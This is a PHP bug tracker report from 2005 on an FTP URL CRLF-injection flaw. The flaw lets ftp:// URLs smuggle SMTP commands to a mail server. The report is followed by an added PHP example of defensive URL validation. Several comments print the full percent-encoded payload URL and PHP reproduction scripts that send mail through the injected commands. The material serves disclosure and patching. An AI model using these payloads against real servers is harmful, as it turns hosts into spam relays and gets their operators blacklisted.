Bug #32936 FTP URL relaying vulnerability
Submitted: 2005-05-04 00:33 UTC Modified: 2005-05-07 02:12 UTC
From: herbert dot groot dot jebbink at gmail dot com Assigned: pollita (profile)
Status: Closed Package: FTP related
PHP Version: 5.0.4 OS: Linux
Private report: No CVE-ID: None

 [2005-05-04 00:33 UTC] herbert dot groot dot jebbink at gmail dot com
Description:
------------
See http://dsbl.org/relay-methods#FTPURL for more details.

An exploit can be found at http://dividedsky.net/gfx/badges

This URL gives the following result.

HTTP/1.x 302 Found
Date: Tue, 03 May 2005 21:43:41 GMT
Server: Apache/2.0.53 (Debian GNU/Linux) PHP/4.3.10-10
Content-Location: badges.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.10-10
Location:
ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AVv%2FcqZoUAlAyMb9O2R+Xu0YSwQNRN5DL%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1


Reproduce code:
---------------
<?php

  // DO NOT RUN THIS CODE

  // YOUR SERVER WILL BE LISTED ON DSBL.ORG

  // RESULTING IN POSSIBLE REJECTS OF YOUR EMAILS

  $check = getimagesize('http://dividedsky.net/gfx/badges') ;

?>



 [2005-05-05 04:42 UTC] pollita@php.net
Interesting...
 [2005-05-05 12:18 UTC] herbert dot groot dot jebbink at gmail dot com
"Interesting" was not the word that I used when I found out that my server was blacklisted as a spam machine and my emails were rejected by many mailservers.

My bot that is written in PHP was trapped in the given exploit.
 [2005-05-06 04:24 UTC] iliaa@php.net
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.


 [2005-05-06 22:24 UTC] herbert dot groot dot jebbink at gmail dot com
Thanks for the patch, however, IMHO the patch should not be applied in the HTTP wrapper to check a redirect but in the FTP wrapper. That way it will also work in the below situation, where PHP is still tricked into sending a mail.

  $ftp = 'ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = file_get_contents($ftp);
 [2005-05-07 00:28 UTC] iliaa@php.net
the patch was applied in 2 places, the HTTP redirect handling and FTP wrapper.
 [2005-05-07 02:12 UTC] herbert dot groot dot jebbink at gmail dot com
I did test both ways before sending my previous comment. PHP now stops a 302 redirect, but the direct FTP way still results in sending an email (there is a warning "failed to open stream: Operation now in progress", but the email is sent).

linux:/home/hgj # cat test.php
<?php

  $http = 'http://dividedsky.net/gfx/badges' ;
  $ftp  = 'ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AvIHU%2FRSZHzlaqPF5ZUxHqE5nj79uL4sg%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/';

  $check = getimagesize($http);
  $check = file_get_contents($ftp);

?>

linux:/home/hgj # /usr/local/bin/php --version
PHP 5.0.5-dev (cgi) (built: May  6 2005 20:58:59)
Copyright (c) 1997-2004 The PHP Group
Zend Engine v2.0.4-dev, Copyright (c) 1998-2004 Zend Technologies

linux:/home/hgj # /usr/local/bin/php test.php
Content-type: text/html
X-Powered-By: PHP/5.0.5-dev

<br />
<b>Warning</b>:  getimagesize(http://dividedsky.net/gfx/badges) [<a href='function.getimagesize'>function.getimagesize</a>]: failed to open stream: Invalid redirect url! ftp://foo%0D%0AMAIL%20FROM%3A<>%0D%0ARCPT%20TO%3A<listme%40listme.dsbl.org>%0D%0ADATA%0D%0ASubject%3A%20DSBL%20Submission%0D%0ATo%3A%20listme%40listme.dsbl.org%0D%0A%0D%0ADSBL%20LISTME%3A%20ftp-url%20%5B82.197.205.88%5D%3A80%0D%0AkeiEBtjqp2q0dV13uGVlTPl8xWpobZPF%0D%0Adividedsky.net%20website%20hit%0D%0ADSBL%20END%0D%0A.%0D%0A:bar@mx.listme.dsbl.org:25/ in <b>/home/hgj/test.php</b> on line <b>6</b><br />
<br />
<b>Warning</b>:  file_get_contents(ftp://...@mx.listme.dsbl.org:25/) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: Operation now in progress in <b>/home/hgj/test.php</b> on line <b>7</b><br />

After a minute or so you can see the result at the dsbl.org website :-) In my case it is the below url:

http://dsbl.org/listing?82.197.205.88
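The thread above argues that the check belongs wherever a URL is about to be handed to a wrapper, not only in the HTTP redirect handler. As an added example (not code from this bug report, from the reporter, or from PHP's own stream wrappers), here is the same idea applied on the calling side: refuse any URL, including a redirect target, whose percent-decoded components contain CR/LF or other control characters, whose scheme is not on an allow-list, or whose port is not the scheme's standard one. The `follow_location` http context option and the `$http_response_header` variable are real PHP features; the host names and the `EVIL` payload in the demo are constructed placeholders, and the function names are this example's own.

```php
<?php
// Added example, not part of the bug report or of PHP's wrappers.
// Caller-side validation for URLs that will be given to getimagesize(),
// file_get_contents() and similar functions, refusing the CRLF-injected
// ftp:// URLs described in this report before any wrapper connects.

declare(strict_types=1);

/**
 * Return true only if $url is safe to hand to a PHP stream wrapper.
 * $allowedSchemes is an allow-list; everything else (ftp://, php://, ...) is refused.
 */
function is_safe_fetch_url(string $url, array $allowedSchemes = ['http', 'https']): bool
{
    // A raw CR or LF anywhere in a URL is never legitimate.
    if (preg_match('/[\r\n]/', $url) === 1) {
        return false;
    }

    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false; // unparsable or relative: refuse rather than guess
    }

    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, $allowedSchemes, true)) {
        return false;
    }

    // Percent-decode every component and refuse control characters. The report's
    // URL carries %0D%0A in the user-info so that the wrapper transmits each line
    // ("MAIL FROM:", "RCPT TO:", ...) to the server as a separate command.
    foreach (['user', 'pass', 'host', 'path', 'query', 'fragment'] as $component) {
        if (isset($parts[$component])
            && preg_match('/[\x00-\x1F\x7F]/', rawurldecode((string) $parts[$component])) === 1) {
            return false;
        }
    }

    // Only the scheme's standard port: the report's URL points ftp:// at port 25 (SMTP).
    $standardPorts = ['http' => 80, 'https' => 443, 'ftp' => 21];
    if (isset($parts['port'])
        && (!isset($standardPorts[$scheme]) || $parts['port'] !== $standardPorts[$scheme])) {
        return false;
    }

    return true;
}

/**
 * Fetch $url without letting the http wrapper follow redirects by itself.
 * Every Location target is passed through is_safe_fetch_url() before the next hop,
 * which is what the getimagesize() case in this report needed. Relative Location
 * values are refused because they have no scheme/host to validate.
 */
function safe_file_get_contents(string $url, int $maxHops = 3): string
{
    $context = stream_context_create(['http' => ['follow_location' => 0, 'timeout' => 10]]);

    for ($hop = 0; $hop <= $maxHops; $hop++) {
        if (!is_safe_fetch_url($url)) {
            throw new RuntimeException("Refusing to fetch unsafe URL: $url");
        }
        $body = file_get_contents($url, false, $context);
        if ($body === false) {
            throw new RuntimeException("Fetch failed: $url");
        }

        // $http_response_header is populated by the http wrapper in this scope.
        $location = null;
        foreach ($http_response_header ?? [] as $header) {
            if (stripos($header, 'Location:') === 0) {
                $location = trim(substr($header, strlen('Location:')));
            }
        }
        if ($location === null) {
            return $body;      // final response, no redirect
        }
        $url = $location;      // validated at the top of the next iteration
    }

    throw new RuntimeException('Too many redirects');
}

// Constructed demo inputs (placeholder hosts, not the ones from the report).
$cases = [
    ['injected ftp URL, default allow-list', 'ftp://user%0D%0AEVIL%0D%0A:pw@mail.example.test:25/', ['http', 'https']],
    ['injected ftp URL, ftp allowed',        'ftp://user%0D%0AEVIL%0D%0A:pw@mail.example.test:25/', ['http', 'https', 'ftp']],
    ['plain ftp URL on port 21',             'ftp://anonymous:guest@ftp.example.test/pub/file.txt', ['http', 'https', 'ftp']],
    ['ordinary https image URL',             'https://images.example.test/badge.png',                ['http', 'https']],
];
foreach ($cases as [$label, $url, $schemes]) {
    printf("%-40s %s\n", $label, is_safe_fetch_url($url, $schemes) ? 'allowed' : 'refused');
}
```

`safe_file_get_contents()` is only defined here, not called, so the block runs offline; the allow-list default (`http`, `https`) alone would have stopped the redirect in this report, and the control-character and port checks cover the direct `file_get_contents($ftp)` case from the last comment even when `ftp` is permitted.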
 